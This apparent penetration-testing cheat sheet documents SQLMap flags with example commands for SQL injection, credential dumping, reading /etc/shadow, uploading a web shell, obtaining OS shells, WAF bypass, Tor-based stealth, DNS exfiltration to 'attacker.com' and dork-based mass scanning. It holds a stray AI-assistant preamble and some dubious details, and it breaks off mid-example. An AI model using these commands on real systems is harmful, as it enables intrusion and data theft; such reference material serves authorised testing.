daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

sqlmap.md (29644B)


      1 ---
      2 title: "SQLMap"
      3 description: "SQLMap automated SQL injection: target flags, techniques, enumeration, dumping and tamper scripts."
      4 category: exploitation
      5 tags: [exploitation, sql-injection, web]
      6 tools: [SQLMap]
      7 difficulty: intermediate
      8 updated: "2026-08-09"
      9 source: "vault:Exploitation/sqlmap.md"
     10 ---
     11 
     12 # SQLMap
     13 
     14 I'll conduct deep research to compile the ultimate SQLMap cheat sheet. Let me systematically gather comprehensive information on all aspects of SQLMap.
     15 
     16 # Ultimate SQLMap Cheat Sheet
     17 
     18 > **⚠️ LEGAL DISCLAIMER**: This cheat sheet is intended exclusively for authorized penetration testing and security assessments. Unauthorized access to computer systems is illegal. Always obtain explicit written permission before conducting security testing. The author assumes no liability for misuse.
     19 
     20 ---
     21 
     22 ## 1. Target Specification & Request Handling
     23 
     24 ### Basic Target Specification
     25 
     26 | Flag/Command | Description | Example Usage |
     27 |:---|:---|:---|
     28 | `-u URL` | Target URL with injectable parameter | `sqlmap -u "http://site.com/page.php?id=1"` |
     29 | `-d DSN` | Direct database connection string | `sqlmap -d "mysql://user:pass@localhost:3306/db"` |
     30 | `-r FILE` | Load HTTP request from file (Burp/ZAP export) | `sqlmap -r request.txt` |
     31 | `-l FILE` | Parse targets from Burp/WebScarab proxy log | `sqlmap -l burp_log.xml` |
     32 | `-g DORK` | Process Google dork results as targets | `sqlmap -g "inurl:'.php?id='"` |
     33 | `-m FILE` | Scan multiple targets from text file | `sqlmap -m targets.txt` |
     34 
     35 ### Crawling & Discovery
     36 
     37 | Flag/Command | Description | Example Usage |
     38 |:---|:---|:---|
     39 | `--crawl=DEPTH` | Crawl website from target URL (finds GET params only) | `sqlmap -u "http://site.com" --crawl=3` |
     40 | `--crawl-exclude` | Exclude pages matching regex during crawl | `sqlmap --crawl=2 --crawl-exclude="logout"` |
     41 | `-x FILE` | Parse and test URLs from XML sitemap | `sqlmap -x http://site.com/sitemap.xml` |
     42 | `--forms` | Parse and test HTML forms on target page | `sqlmap -u "http://site.com/login.php" --forms` |
     43 
     44 ### Request Customization
     45 
     46 | Flag/Command | Description | Example Usage |
     47 |:---|:---|:---|
     48 | `--data=DATA` | POST data string (use with `-u`) | `sqlmap -u "http://site.com/login" --data="user=admin&pass=test"` |
     49 | `--method=METHOD` | Force HTTP method (GET/POST/PUT/DELETE/PATCH) | `sqlmap -u "http://site.com/api" --method=PUT` |
     50 | `--cookie=COOKIE` | HTTP Cookie header value | `sqlmap -u "http://site.com" --cookie="PHPSESSID=abc123"` |
     51 | `--headers=HEADERS` | Extra headers (newline-separated) | `sqlmap -u URL --headers="X-Forwarded-For: 1.2.3.4\nAccept: */*"` |
     52 | `--referer=REFERER` | HTTP Referer header | `sqlmap -u URL --referer="http://google.com"` |
     53 | `--user-agent=UA` | Custom User-Agent | `sqlmap -u URL --user-agent="Mozilla/5.0..."` |
     54 | `--random-agent` | Use randomly selected User-Agent | `sqlmap -u URL --random-agent` |
     55 | `--mobile` | Imitate smartphone User-Agent | `sqlmap -u URL --mobile` |
     56 | `--host=HOST` | Custom HTTP Host header | `sqlmap -u URL --host="target.local"` |
     57 
     58 ### Authentication
     59 
     60 | Flag/Command | Description | Example Usage |
     61 |:---|:---|:---|
     62 | `--auth-type=TYPE` | HTTP authentication (Basic/Digest/NTLM/PKI) | `sqlmap -u URL --auth-type=Basic --auth-cred="user:pass"` |
     63 | `--auth-cred=CRED` | Authentication credentials (username:password) | `sqlmap -u URL --auth-type=Digest --auth-cred="admin:secret"` |
     64 | `--auth-file=FILE` | HTTP authentication PEM cert/private key file | `sqlmap -u URL --auth-type=PKI --auth-file=key.pem` |
     65 
     66 ### Custom Injection Points
     67 
     68 | Flag/Command | Description | Example Usage |
     69 |:---|:---|:---|
     70 | `-p PARAMETER` | Testable parameter(s) | `sqlmap -u URL -p "id,user"` |
     71 | `--skip=PARAM` | Skip testing specific parameters | `sqlmap -u URL --skip="csrf_token"` |
     72 | `--param-exclude` | Exclude parameters by regex | `sqlmap -u URL --param-exclude="token.*"` |
     73 | `*` (marker) | Mark custom injection point in URL or data | `sqlmap -u "http://site.com/page?id=1*&user=admin"` |
     74 
     75 **Example: Testing POST Request from Burp Suite**
     76 ```bash
     77 # Save Burp request to request.txt, then:
     78 sqlmap -r request.txt --batch --level=3 --risk=2
     79 ```
     80 
     81 ---
     82 
     83 ## 2. Optimization & Performance
     84 
     85 ### Multithreading & Speed
     86 
     87 | Flag/Command | Description | Example Usage |
     88 |:---|:---|:---|
     89 | `--threads=NUM` | Max number of concurrent HTTP requests (default 1, max 10) | `sqlmap -u URL --threads=5` |
     90 | `-o` | Enable all optimization switches | `sqlmap -u URL -o --threads=5` |
     91 | `--predict-output` | Predict common queries output (cannot use with `--threads`) | `sqlmap -u URL --predict-output` |
     92 
     93 ### Connection Optimization
     94 
     95 | Flag/Command | Description | Example Usage |
     96 |:---|:---|:---|
     97 | `--keep-alive` | Use persistent HTTP(s) connections | `sqlmap -u URL --keep-alive` |
     98 | `--null-connection` | Retrieve page length without actual content (faster) | `sqlmap -u URL --null-connection` |
     99 | `--timeout=SECS` | Seconds to wait before connection timeout (default 30) | `sqlmap -u URL --timeout=10` |
    100 | `--retries=NUM` | Retries when connection timeout occurs (default 3) | `sqlmap -u URL --retries=5` |
    101 | `--delay=SECS` | Delay in seconds between each HTTP request | `sqlmap -u URL --delay=2` |
    102 
    103 ### Session Management
    104 
    105 | Flag/Command | Description | Example Usage |
    106 |:---|:---|:---|
    107 | `--flush-session` | Permanently delete session data for current target | `sqlmap -u URL --flush-session` |
    108 | `--fresh-queries` | Ignore session file data (don't delete, just skip) | `sqlmap -u URL --fresh-queries` |
    109 | `--purge` | Safely remove all content from sqlmap data directory | `sqlmap --purge` |
    110 
    111 **Performance Optimization Example:**
    112 ```bash
    113 # Fast scan with optimizations
    114 sqlmap -u "http://site.com/page?id=1" -o --threads=10 --keep-alive --batch
    115 ```
    116 
    117 ---
    118 
    119 ## 3. Injection Techniques & Detection
    120 
    121 ### Technique Selection
    122 
    123 | Code | Technique | Description |
    124 |:---|:---|:---|
    125 | `B` | Boolean-based blind | True/False logic to infer data |
    126 | `E` | Error-based | Extract data from DBMS error messages |
    127 | `U` | UNION query-based | Append UNION SELECT to retrieve data directly |
    128 | `S` | Stacked queries | Execute additional SQL statements (required for command execution) |
    129 | `T` | Time-based blind | Use database time delays to infer data |
    130 | `Q` | Inline queries | Inline query injection (rare) |
    131 
    132 | Flag/Command | Description | Example Usage |
    133 |:---|:---|:---|
    134 | `--technique=TECH` | SQL injection techniques to test (default: BEUSTQ) | `sqlmap -u URL --technique=BEUS` (skip time-based) |
    135 | `--time-sec=SECS` | Seconds to delay for time-based blind (default 5) | `sqlmap -u URL --time-sec=10` |
    136 
    137 ### Risk & Level Configuration
    138 
    139 | Flag/Command | Description | Example Usage |
    140 |:---|:---|:---|
    141 | `--level=LEVEL` | Test depth (1-5, default 1). Level 2+ tests cookies, Level 3+ tests User-Agent/Referer | `sqlmap -u URL --level=5` |
    142 | `--risk=RISK` | Risk of tests (1-3, default 1). Higher includes OR-based and heavy queries | `sqlmap -u URL --risk=3` |
    143 
    144 **Level Details:**
    145 * **Level 1**: Basic GET/POST parameters
    146 * **Level 2**: Adds HTTP Cookie values
    147 * **Level 3**: Adds User-Agent and Referer headers
    148 * **Level 4**: More extensive test coverage
    149 * **Level 5**: Maximal test coverage (slowest)
    150 
    151 **Risk Details:**
    152 * **Risk 1**: Safe tests only
    153 * **Risk 2**: Adds heavy time-based queries
    154 * **Risk 3**: Adds OR-based injection (may UPDATE/DELETE data)
    155 
    156 ### DBMS Specification
    157 
    158 | Flag/Command | Description | Example Usage |
    159 |:---|:---|:---|
    160 | `--dbms=DBMS` | Force backend DBMS (MySQL, Oracle, PostgreSQL, MSSQL, etc.) | `sqlmap -u URL --dbms=MySQL` |
    161 | `--os=OS` | Force backend OS (Linux, Windows) | `sqlmap -u URL --os=Linux` |
    162 | `--fingerprint` | Extensive DBMS version fingerprinting | `sqlmap -u URL --fingerprint` |
    163 | `--banner` | Retrieve DBMS banner | `sqlmap -u URL --banner` |
    164 
    165 ### UNION-Specific Flags
    166 
    167 | Flag/Command | Description | Example Usage |
    168 |:---|:---|:---|
    169 | `--union-cols=RANGE` | Range of columns to test in UNION (e.g., 1-20) | `sqlmap -u URL --union-cols=5-15` |
    170 | `--union-char=CHAR` | Character to use for bruteforcing column numbers | `sqlmap -u URL --union-char=GH` |
    171 | `--union-from=TABLE` | Table name to use in FROM clause of UNION | `sqlmap -u URL --union-from=users` |
    172 
    173 ### Detection Methods
    174 
    175 | Flag/Command | Description | Example Usage |
    176 |:---|:---|:---|
    177 | `--string=STRING` | String to match when query is TRUE | `sqlmap -u URL --string="Welcome"` |
    178 | `--not-string=STRING` | String to match when query is FALSE | `sqlmap -u URL --not-string="Invalid"` |
    179 | `--regexp=REGEXP` | Regexp to match when query is TRUE | `sqlmap -u URL --regexp="user.*found"` |
    180 | `--code=CODE` | HTTP code to match when query is TRUE | `sqlmap -u URL --code=200` |
    181 | `--text-only` | Compare pages based on text content only | `sqlmap -u URL --text-only` |
    182 | `--titles` | Compare pages based on title only | `sqlmap -u URL --titles` |
    183 
    184 **Example: Aggressive Testing**
    185 ```bash
    186 sqlmap -u "http://site.com/page?id=1" --level=5 --risk=3 --technique=BEUST --batch
    187 ```
    188 
    189 ---
    190 
    191 ## 4. Enumeration (The "Takeover" Phase)
    192 
    193 ### Database & User Information
    194 
    195 | Flag/Command | Description | Example Usage |
    196 |:---|:---|:---|
    197 | `--current-user` | Retrieve DBMS current user | `sqlmap -u URL --current-user` |
    198 | `--current-db` | Retrieve DBMS current database | `sqlmap -u URL --current-db` |
    199 | `--hostname` | Retrieve server hostname | `sqlmap -u URL --hostname` |
    200 | `--is-dba` | Detect if current user is DBA | `sqlmap -u URL --is-dba` |
    201 | `--users` | Enumerate DBMS users | `sqlmap -u URL --users` |
    202 | `--passwords` | Enumerate user password hashes (attempts to crack) | `sqlmap -u URL --passwords` |
    203 | `--privileges` | Enumerate user privileges | `sqlmap -u URL --privileges` |
    204 | `--roles` | Enumerate user roles | `sqlmap -u URL --roles` |
    205 
    206 ### Database Enumeration
    207 
    208 | Flag/Command | Description | Example Usage |
    209 |:---|:---|:---|
    210 | `--dbs` | List all databases | `sqlmap -u URL --dbs` |
    211 | `-D DATABASE` | Specify target database | `sqlmap -u URL -D testdb --tables` |
    212 | `--tables` | List tables in database(s) | `sqlmap -u URL -D testdb --tables` |
    213 | `-T TABLE` | Specify target table | `sqlmap -u URL -D testdb -T users --columns` |
    214 | `--columns` | List columns in table(s) | `sqlmap -u URL -D testdb -T users --columns` |
    215 | `-C COLUMN` | Specify target column(s) | `sqlmap -u URL -D testdb -T users -C username,password --dump` |
    216 | `--schema` | Enumerate entire DBMS schema | `sqlmap -u URL --schema` |
    217 | `--count` | Retrieve number of entries in table(s) | `sqlmap -u URL -D testdb -T users --count` |
    218 
    219 ### Data Extraction
    220 
    221 | Flag/Command | Description | Example Usage |
    222 |:---|:---|:---|
    223 | `--dump` | Dump table entries | `sqlmap -u URL -D testdb -T users --dump` |
    224 | `--dump-all` | Dump all DBMS databases tables | `sqlmap -u URL --dump-all` |
    225 | `--exclude-sysdbs` | Exclude system databases during enumeration | `sqlmap -u URL --dump-all --exclude-sysdbs` |
    226 | `--start=ROW` | First dump table entry to retrieve | `sqlmap -u URL -D testdb -T users --start=50 --stop=100 --dump` |
    227 | `--stop=ROW` | Last dump table entry to retrieve | `sqlmap -u URL -D testdb -T users --start=1 --stop=10 --dump` |
    228 | `--where=CLAUSE` | Use WHERE condition during table dump | `sqlmap -u URL -D testdb -T users --dump --where="id>100"` |
    229 | `--pivot-column=COL` | Use pivot column name for unique row identifiers | `sqlmap -u URL --dump --pivot-column=id` |
    230 
    231 ### Search Functions
    232 
    233 | Flag/Command | Description | Example Usage |
    234 |:---|:---|:---|
    235 | `--search` | Search for databases, tables, or columns | `sqlmap -u URL --search -C password` |
    236 | `-C COLUMN` | Search for column name(s) | `sqlmap -u URL --search -C "user,pass"` |
    237 | `-T TABLE` | Search for table name(s) | `sqlmap -u URL --search -T "admin"` |
    238 | `-D DATABASE` | Search for database name(s) | `sqlmap -u URL --search -D "prod"` |
    239 
    240 ### Direct SQL Execution
    241 
    242 | Flag/Command | Description | Example Usage |
    243 |:---|:---|:---|
    244 | `--sql-query=QUERY` | Execute custom SQL statement | `sqlmap -u URL --sql-query="SELECT user()"` |
    245 | `--sql-shell` | Interactive SQL shell | `sqlmap -u URL --sql-shell` |
    246 | `--sql-file=FILE` | Execute SQL statements from file | `sqlmap -u URL --sql-file=queries.sql` |
    247 
    248 ### Brute Force Discovery
    249 
    250 | Flag/Command | Description | Example Usage |
    251 |:---|:---|:---|
    252 | `--common-tables` | Check existence of common table names | `sqlmap -u URL --common-tables` |
    253 | `--common-columns` | Check existence of common column names | `sqlmap -u URL -D testdb -T users --common-columns` |
    254 
    255 ### Complete Enumeration Example
    256 ```bash
    257 # Enumerate everything
    258 sqlmap -u "http://site.com/page?id=1" -a --batch
    259 
    260 # Target specific database and table
    261 sqlmap -u URL --batch --dbs
    262 sqlmap -u URL --batch -D webapp -T users --columns
    263 sqlmap -u URL --batch -D webapp -T users -C id,username,password --dump
    264 ```
    265 
    266 **Output Formats:**
    267 
    268 | Flag/Command | Description | Example Usage |
    269 |:---|:---|:---|
    270 | `--dump-format=FORMAT` | Dump data format (CSV, HTML, SQLITE) | `sqlmap -u URL --dump --dump-format=HTML` |
    271 | `--csv-del=CHAR` | CSV delimiter character (default `,`) | `sqlmap -u URL --dump --csv-del=";"` |
    272 
    273 ---
    274 
    275 ## 5. System Access & File System
    276 
    277 ### File System Operations
    278 
    279 | Flag/Command | Description | Example Usage |
    280 |:---|:---|:---|
    281 | `--file-read=FILE` | Read file from the DBMS file system | `sqlmap -u URL --file-read="/etc/passwd"` |
    282 | `--file-write=LOCAL` | Local file to write to backend DBMS | `sqlmap -u URL --file-write="shell.php" --file-dest="/var/www/html/shell.php"` |
    283 | `--file-dest=REMOTE` | Absolute path to write file on backend | See above example |
    284 
    285 **Note:** File operations typically require DBA privileges and `LOAD_FILE()` (MySQL) or similar functions.
    286 
    287 ### OS Command Execution
    288 
    289 | Flag/Command | Description | Example Usage |
    290 |:---|:---|:---|
    291 | `--os-cmd=CMD` | Execute single operating system command | `sqlmap -u URL --os-cmd="whoami"` |
    292 | `--os-shell` | Interactive operating system shell (requires stacked queries) | `sqlmap -u URL --os-shell` |
    293 | `--os-pwn` | Prompt for OOB Meterpreter/VNC shell (requires stacked queries) | `sqlmap -u URL --os-pwn --msf-path="/opt/metasploit"` |
    294 | `--msf-path=PATH` | Path to Metasploit Framework installation | See above example |
    295 | `--priv-esc` | Database process user privilege escalation | `sqlmap -u URL --priv-esc` |
    296 
    297 **Requirements for OS Takeover:**
    298 * Stacked queries support (`S` technique)
    299 * DBA privileges (usually)
    300 * File write permissions on web directory or xp_cmdshell (MSSQL)
    301 
    302 ### Windows Registry Access
    303 
    304 **Note:** Works with MySQL (via UDF), PostgreSQL, and MSSQL when stacked queries are supported.
    305 
    306 | Flag/Command | Description | Example Usage |
    307 |:---|:---|:---|
    308 | `--reg-read` | Read Windows registry key value | `sqlmap -u URL --reg-read --reg-key="HKLM\Software\..." --reg-value="Version"` |
    309 | `--reg-add` | Write Windows registry key value | `sqlmap -u URL --reg-add --reg-key="HKLM\..." --reg-value="Test" --reg-data="123" --reg-type=REG_SZ` |
    310 | `--reg-del` | Delete Windows registry key value | `sqlmap -u URL --reg-del --reg-key="HKLM\..." --reg-value="Test"` |
    311 | `--reg-key=KEY` | Registry key path | See examples above |
    312 | `--reg-value=VALUE` | Registry key value name | See examples above |
    313 | `--reg-data=DATA` | Registry key value data | See examples above |
    314 | `--reg-type=TYPE` | Registry key value type (REG_SZ, REG_DWORD, etc.) | See examples above |
    315 
    316 ### UDF Injection
    317 
    318 | Flag/Command | Description | Example Usage |
    319 |:---|:---|:---|
    320 | `--udf-inject` | Inject custom user-defined functions | `sqlmap -u URL --udf-inject` |
    321 
    322 ### File System Takeover Example
    323 ```bash
    324 # Read sensitive file
    325 sqlmap -u "http://site.com/page?id=1" --file-read="/etc/shadow" --batch
    326 
    327 # Upload web shell
    328 sqlmap -u URL --file-write="shell.php" --file-dest="/var/www/html/backdoor.php" --batch
    329 
    330 # Get OS shell
    331 sqlmap -u URL --os-shell --batch
    332 # Then execute: whoami, id, uname -a
    333 ```
    334 
    335 ---
    336 
    337 ## 6. WAF Bypass & Tamper Scripts
    338 
    339 ### WAF Detection
    340 
    341 | Flag/Command | Description | Example Usage |
    342 |:---|:---|:---|
    343 | `--check-waf` | Check for WAF/IPS protection | `sqlmap -u URL --check-waf` |
    344 | `--skip-waf` | Skip WAF/IPS detection mechanism | `sqlmap -u URL --skip-waf` |
    345 
    346 ### Tamper Script Usage
    347 
    348 | Flag/Command | Description | Example Usage |
    349 |:---|:---|:---|
    350 | `--tamper=SCRIPT` | Use tamper script(s) to modify injection payloads | `sqlmap -u URL --tamper=space2comment` |
    351 | Multiple tampers | Chain multiple tampers (comma-separated) | `sqlmap -u URL --tamper=between,randomcase,space2comment` |
    352 
    353 ### Top 10 Tamper Scripts
    354 
    355 | Tamper Script | Description | Use Case | Example Transformation |
    356 |:---|:---|:---|:---|
    357 | `space2comment` | Replaces space with `/**/` | Bypass basic space filtering, general WAF evasion | `SELECT id FROM users` → `SELECT/**/id/**/FROM/**/users` |
    358 | `between` | Replaces `>` with `NOT BETWEEN 0 AND #`, `=` with `BETWEEN # AND #` | Bypass operator blocking (CloudFlare, ModSecurity) | `id=1` → `id BETWEEN 1 AND 1` |
    359 | `randomcase` | Randomizes character case in keywords | Bypass case-sensitive filters | `SELECT` → `SeLeCt` |
    360 | `charencode` | URL-encodes all payload characters | Bypass basic signature detection | `' OR 1=1` → `%27%20%4F%52%20%31%3D%31` |
    361 | `apostrophenullencode` | Replaces apostrophe with `%00%27` | Bypass magic_quotes and basic escaping | `'` → `%00%27` |
    362 | `base64encode` | Base64 encodes entire payload (requires DBMS support for decoding) | Advanced evasion for intelligent WAFs | `UNION SELECT` → `VU5JT04gU0VMRUNUA==` |
    363 | `unmagicquotes` | Replaces quote with multibyte combo `%bf%27` | Bypass magic_quotes in PHP/MySQL (GBK charset required) | `'` → `%bf%27` |
    364 | `space2plus` | Replaces space with `+` | Basic WAF evasion, URL encoding normalization | `SELECT id` → `SELECT+id` |
    365 | `apostrophemask` | Replaces apostrophe with UTF-8 full-width equivalent | Bypass basic apostrophe filtering | `'` → `'` |
    366 | `securesphere` | Specific tamper for Imperva SecureSphere WAF | Known Imperva bypasses | Adds special chars/comments |
    367 
    368 ### DBMS-Specific Tampers
    369 
    370 #### MySQL Tampers
    371 
    372 | Tamper Script | Description | Example |
    373 |:---|:---|:---|
    374 | `space2mysqldash` | Replace space with `--` followed by newline | `SELECT id` → `SELECT--[\n]id` |
    375 | `space2hash` | Replace space with `#` followed by random string and newline | `SELECT id` → `SELECT#foo[\n]id` |
    376 | `versionedkeywords` | Enclose each keyword with MySQL version comment | `UNION SELECT` → `/*!UNION*//*!SELECT*/` |
    377 | `versionedmorekeywords` | Version comments around more keywords | Extended version of above |
    378 
    379 #### MSSQL Tampers
    380 
    381 | Tamper Script | Description | Example |
    382 |:---|:---|:---|
    383 | `space2mssqlblank` | Replace space with random blank character from valid MSSQL set | Uses `%01-%08`, `%0B`, etc. |
    384 | `space2dash` | Replace space with `--` followed by random string | `SELECT id` → `SELECT--foo[\n]id` |
    385 
    386 #### ModSecurity Tampers
    387 
    388 | Tamper Script | Description | Example |
    389 |:---|:---|:---|
    390 | `modsecurityversioned` | Embraces query with versioned comment | `1 AND 1=1` → `1 /*!30000AND 1=1*/` |
    391 | `modsecurityzeroversioned` | Embraces query with zero-versioned comment | `1 AND 1=1` → `1 /*!00000AND 1=1*/` |
    392 
    393 ### General Purpose Tampers
    394 
    395 | Tamper Script | Description | Use Case |
    396 |:---|:---|:---|
    397 | `equaltolike` | Replaces `=` with `LIKE` | Bypass `=` operator filtering |
    398 | `greatest` | Replaces `>` with `GREATEST` function | Bypass comparison operator blocking |
    399 | `multiplespaces` | Adds multiple spaces around SQL keywords | Confuse signature-based detection |
    400 | `nonrecursivereplacement` | Replace keywords with double representation | Bypass filters using `.replace()` once (e.g., `SESELECTLECT` → `SELECT`) |
    401 
    402 ### WAF Bypass Strategy Examples
    403 
    404 **Cloudflare Bypass:**
    405 ```bash
    406 sqlmap -u URL --tamper=between,randomcase,space2comment --random-agent --delay=2
    407 ```
    408 
    409 **ModSecurity Bypass:**
    410 ```bash
    411 sqlmap -u URL --tamper=modsecurityversioned,space2comment,between --level=5 --risk=3
    412 ```
    413 
    414 **Generic WAF Bypass with Tor:**
    415 ```bash
    416 sqlmap -u URL --tamper=apostrophemask,between,charencode,randomcase --tor --tor-type=SOCKS5 --check-tor --random-agent
    417 ```
    418 
    419 **Imperva SecureSphere Bypass:**
    420 ```bash
    421 sqlmap -u URL --tamper=securesphere,space2comment --random-agent
    422 ```
    423 
    424 **MySQL with magic_quotes:**
    425 ```bash
    426 sqlmap -u URL --tamper=unmagicquotes --dbms=MySQL
    427 ```
    428 
    429 ---
    430 
    431 ## 7. Advanced/Obscure Features
    432 
    433 ### Proxy & Anonymity
    434 
    435 | Flag/Command | Description | Example Usage |
    436 |:---|:---|:---|
    437 | `--proxy=PROXY` | Use HTTP/SOCKS proxy (http://ip:port or socks5://ip:port) | `sqlmap -u URL --proxy="http://127.0.0.1:8080"` |
    438 | `--proxy-cred=CRED` | Proxy authentication credentials | `sqlmap -u URL --proxy=URL --proxy-cred="user:pass"` |
    439 | `--proxy-file=FILE` | Load proxy list from file | `sqlmap -u URL --proxy-file=proxies.txt` |
    440 | `--ignore-proxy` | Ignore system default proxy settings | `sqlmap -u URL --ignore-proxy` |
    441 | `--tor` | Use Tor anonymity network | `sqlmap -u URL --tor --tor-port=9050` |
    442 | `--tor-port=PORT` | Set Tor proxy port (default 8118) | See above |
    443 | `--tor-type=TYPE` | Tor proxy type (HTTP, SOCKS4, SOCKS5 - default SOCKS5) | `sqlmap -u URL --tor --tor-type=SOCKS5` |
    444 | `--check-tor` | Check if Tor is used properly | `sqlmap -u URL --tor --check-tor` |
    445 
    446 ### DNS Exfiltration
    447 
    448 | Flag/Command | Description | Example Usage |
    449 |:---|:---|:---|
    450 | `--dns-domain=DOMAIN` | Use DNS exfiltration attack (out-of-band technique) | `sqlmap -u URL --dns-domain="attacker.com"` |
    451 
    452 **Requires:** A DNS server under your control to capture subdomain queries containing exfiltrated data.
    453 
    454 ### Second-Order Injection
    455 
    456 | Flag/Command | Description | Example Usage |
    457 |:---|:---|:---|
    458 | `--second-url=URL` | Target URL for second-order response | `sqlmap -u "http://site.com/post" --second-url="http://site.com/profile"` |
    459 | `--second-req=FILE` | Load second-order HTTP request from file | `sqlmap -u URL --second-req=second.txt` |
    460 
    461 **Use Case:** Inject payload on one page (e.g., registration), effect appears on another (e.g., profile page).
    462 
    463 ### Custom Payload Manipulation
    464 
    465 | Flag/Command | Description | Example Usage |
    466 |:---|:---|:---|
    467 | `--eval=CODE` | Evaluate provided Python code before each request | `sqlmap -u URL --eval="import hashlib; hash=hashlib.md5(id).hexdigest()"` |
    468 | `--skip-urlencode` | Skip URL encoding of payload data | `sqlmap -u URL --skip-urlencode` |
    469 
    470 **--eval Use Case:** Generate dynamic tokens or hashes required by the application for each request.
    471 
    472 ### HTTP Parameter Pollution (HPP)
    473 
    474 | Flag/Command | Description | Example Usage |
    475 |:---|:---|:---|
    476 | `--hpp` | Use HTTP Parameter Pollution technique | `sqlmap -u URL --hpp` |
    477 
    478 Sends same parameter multiple times (e.g., `?id=1&id=2`). Different servers parse this differently.
    479 
    480 ### Chunked Transfer Encoding
    481 
    482 | Flag/Command | Description | Example Usage |
    483 |:---|:---|:---|
    484 | `--chunked` | Use HTTP chunked transfer encoded POST requests | `sqlmap -u URL --data="..." --chunked` |
    485 
    486 **Use Case:** Bypass WAFs that don't properly handle chunked encoding.
    487 
    488 ### CSRF Token Handling
    489 
    490 | Flag/Command | Description | Example Usage |
    491 |:---|:---|:---|
    492 | `--csrf-token=TOKEN` | Parameter name holding anti-CSRF token | `sqlmap -u URL --data="..." --csrf-token="csrf_token"` |
    493 | `--csrf-url=URL` | URL to extract anti-CSRF token from | `sqlmap -u URL --csrf-token="token" --csrf-url="http://site.com/form"` |
    494 | `--csrf-method=METHOD` | HTTP method to use for CSRF token page | `sqlmap -u URL --csrf-token="token" --csrf-method=GET` |
    495 
    496 SQLMap will automatically extract and include the CSRF token in each request.
    497 
    498 ### Safe URL Visits
    499 
    500 | Flag/Command | Description | Example Usage |
    501 |:---|:---|:---|
    502 | `--safe-url=URL` | Regularly visit this URL during testing | `sqlmap -u URL --safe-url="http://site.com/keepalive"` |
    503 | `--safe-freq=NUM` | Test requests between visits to safe URL | `sqlmap -u URL --safe-url=URL --safe-freq=5` |
    504 
    505 **Use Case:** Keep session alive or bypass rate limiting by visiting benign pages periodically.
    506 
    507 ### Scope Control
    508 
    509 | Flag/Command | Description | Example Usage |
    510 |:---|:---|:---|
    511 | `--scope=REGEX` | Filter targets from proxy log by regex | `sqlmap -l burp.log --scope=".*\.target\.com.*"` |
    512 | `--test-filter=FILTER` | Filter tests by payloads/titles | `sqlmap -u URL --test-filter="ROW"` |
    513 | `--test-skip=FILTER` | Skip tests by payloads/titles | `sqlmap -u URL --test-skip="BENCHMARK"` |
    514 
    515 ### Output & Logging
    516 
    517 | Flag/Command | Description | Example Usage |
    518 |:---|:---|:---|
    519 | `--output-dir=DIR` | Custom output directory path | `sqlmap -u URL --output-dir="/tmp/scan"` |
    520 | `-t FILE` | Log all HTTP traffic to text file | `sqlmap -u URL -t traffic.log` |
    521 | `--traffic-file=FILE` | Alternative syntax for traffic logging | `sqlmap -u URL --traffic-file=http.log` |
    522 | `--har=FILE` | Log all HTTP traffic to HAR file | `sqlmap -u URL --har=traffic.har` |
    523 | `--batch` | Never ask for user input (use defaults) | `sqlmap -u URL --batch` |
    524 | `--answers=ANSWERS` | Set predefined answers (e.g., crack=N) | `sqlmap -u URL --answers="crack=N,follow=N"` |
    525 
    526 ### Verbosity & Debugging
    527 
    528 | Flag/Command | Description | Example Usage |
    529 |:---|:---|:---|
    530 | `-v LEVEL` | Verbosity level (0-6, default 1) | `sqlmap -u URL -v 3` |
    531 | `--parse-errors` | Parse and display DBMS error messages | `sqlmap -u URL --parse-errors` |
    532 | `--wizard` | Interactive wizard mode for beginners | `sqlmap --wizard` |
    533 | `--beep` | Beep on question/injection found | `sqlmap -u URL --beep` |
    534 | `--alert=CMD` | Run OS command when injection found | `sqlmap -u URL --alert="notify-send 'Found!'"` |
    535 
    536 **Verbosity Levels:**
    537 * **0**: Show only errors and critical messages
    538 * **1** (default): Info, warnings, errors, critical
    539 * **2**: Add debug messages
    540 * **3**: Show payloads being sent
    541 * **4**: Show HTTP requests
    542 * **5**: Show HTTP response headers
    543 * **6**: Show HTTP response content (full)
    544 
    545 ### Maintenance
    546 
    547 | Flag/Command | Description | Example Usage |
    548 |:---|:---|:---|
    549 | `--update` | Update SQLMap to latest development version | `sqlmap --update` |
    550 | `--dependencies` | Check for missing dependencies | `sqlmap --dependencies` |
    551 
    552 ### Miscellaneous Advanced Flags
    553 
    554 | Flag/Command | Description | Example Usage |
    555 |:---|:---|:---|
    556 | `--invalid-bignum` | Use big numbers for invalidating parameter values | `sqlmap -u URL --invalid-bignum` |
    557 | `--invalid-logical` | Use logical operations for invalidating values | `sqlmap -u URL --invalid-logical` |
    558 | `--common-files` | Check for common files on DBMS file system | `sqlmap -u URL --common-files` |
    559 | `-a` / `--all` | Retrieve everything (banner, users, db, tables, columns, dump) | `sqlmap -u URL -a --batch` |
    560 
    561 ---
    562 
    563 ## Practical Workflow Examples
    564 
    565 ### 1. Quick Vulnerability Assessment
    566 ```bash
    567 sqlmap -u "http://target.com/page?id=1" --batch --level=3 --risk=2 --dbs
    568 ```
    569 
    570 ### 2. Authenticated POST Request Testing
    571 ```bash
    572 # Capture request in Burp, save to req.txt
    573 sqlmap -r req.txt --batch --level=2 --current-db --tables
    574 ```
    575 
    576 ### 3. Dump Specific Table with WAF Bypass
    577 ```bash
    578 sqlmap -u URL -D webapp -T users -C username,password,email --dump \
    579   --tamper=between,randomcase,space2comment \
    580   --random-agent \
    581   --threads=5 \
    582   --batch
    583 ```
    584 
    585 ### 4. OS Shell Access
    586 ```bash
    587 sqlmap -u URL --batch --level=3 --risk=3 --os-shell
    588 # Requires: stacked queries support, DBA privileges
    589 ```
    590 
    591 ### 5. Tor + Tamper + Slow Scan (Stealth)
    592 ```bash
    593 sqlmap -u URL \
    594   --tor --tor-type=SOCKS5 --check-tor \
    595   --tamper=space2comment,randomcase \
    596   --random-agent \
    597   --delay=3 \
    598   --level=3 \
    599   --batch
    600 ```
    601 
    602 ### 6. Complete Enumeration with Output
    603 ```bash
    604 sqlmap -u URL -a \
    605   --dump-all \
    606   --exclude-sysdbs \
    607   --output-dir=/tmp/sqlmap_results \
    608   --dump-format=CSV \
    609   --batch
    610 ```
    611 
    612 ### 7. Google Dork Mass Scanning
    613 ```bash
    614 sqlmap -g "inurl:'.php?id=' site:target.com" \
    615   --batch \
    616   --level=2 \
    617   --threads=5 \
    618   --dbs
    619 ```
    620 
    621 ### 8. Second-Order Injection
    622 ```bash
